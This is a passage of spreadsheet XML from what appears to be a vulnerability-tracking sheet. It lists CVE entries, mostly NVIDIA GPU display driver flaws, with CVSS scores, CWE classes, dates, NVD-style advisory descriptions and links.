      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q191" s="5" t="inlineStr"/>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>CWE-131</t>
        </is>
      </c>
      <c r="S191" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer where an attacker could cause an incorrect buffer size calculation. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47578</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47579</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="inlineStr"/>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr"/>
      <c r="K192" s="5" t="inlineStr"/>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q192" s="5" t="inlineStr"/>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S192" s="5" t="inlineStr">
        <is>
          <t>The NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode driver through which a user might trigger a use-after-free condition. Successful exploitation of this issue could lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47579</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47583</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="inlineStr"/>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q193" s="5" t="inlineStr"/>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S193" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module where an attacker could cause type confusion. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47583</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47585</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="inlineStr"/>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr"/>
      <c r="K194" s="5" t="inlineStr"/>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q194" s="5" t="inlineStr"/>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S194" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module where an attacker could cause an integer underflow. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47585</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47587</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="inlineStr"/>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr"/>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q195" s="5" t="inlineStr"/>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S195" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability where an unprivileged user could cause a use-after-free. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47587</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47588</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="inlineStr"/>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr"/>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q196" s="5" t="inlineStr"/>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S196" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability where an unprivileged user could cause a use-after-free condition by issuing a sequence of driver commands. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service and information disclosure.</t>
        </is>
      </c>
      <c r="T196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47588</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47589</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="inlineStr"/>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr"/>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q197" s="5" t="inlineStr"/>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S197"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and information disclosure.</t>
        </is>
      </c>
      <c r="T197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47589</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47590</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="inlineStr"/>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr"/>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q198" s="5" t="inlineStr"/>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S198"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and information disclosure.</t>
        </is>
      </c>
      <c r="T198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47590</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47591</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="inlineStr"/>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr"/>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q199" s="5" t="inlineStr"/>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S199" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user could bypass read-only memory protection due to incorrect authorization, enabling write access to memory marked read-only. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47591</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47592</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="inlineStr"/>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr"/>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q200" s="5" t="inlineStr"/>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S200" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an unprivileged user could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47592</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47593</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="inlineStr"/>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q201" s="5" t="inlineStr"/>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S201" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer where an unprivileged user can cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, and denial of service.</t>
        </is>
      </c>
      <c r="T201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47593</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47594</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="inlineStr"/>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr"/>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q202" s="5" t="inlineStr"/>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S202" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability where an unprivileged user may cause a use-after-free condition by issuing a sequence of driver commands. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, data tampering, and information disclosure.</t>
        </is>
      </c>
      <c r="T202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47594</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47595</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="inlineStr"/>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr"/>
      <c r="K203" s="5" t="inlineStr"/>
      <c r="L203" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q203" s="5" t="inlineStr"/>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>CWE-281</t>
        </is>
      </c>
      <c r="S203" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user can write to read-only memory because the memory's permissions are not preserved. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47595</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47597</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="inlineStr"/>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr"/>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q204" s="5" t="inlineStr"/>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S204" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the open-source kernel module Resource Server where an unprivileged local user could cause a use-after-free through a missing self-reference guard in the map cleanup path. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47597</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47599</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="inlineStr"/>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>CWE-281</t>
        </is>
      </c>
      <c r="S205" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the open-source kernel module where an unprivileged local user could cause improper preservation of memory access permissions during DMA mapping. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47599</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47600</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="inlineStr"/>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr"/>
      <c r="K206" s="5" t="inlineStr"/>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q206" s="5" t="inlineStr"/>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S206" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an error-handling path could operate on an improperly initialized resource. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47600</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47601</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="inlineStr"/>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr"/>
      <c r="K207" s="5" t="inlineStr"/>
      <c r="L207" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q207" s="5" t="inlineStr"/>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S207" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the open-source kernel module DMA-BUF import path where an unprivileged local user could cause improper preservation of memory access permissions when importing a read-only buffer from another device's DMA-BUF exporter. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47601</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53605</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
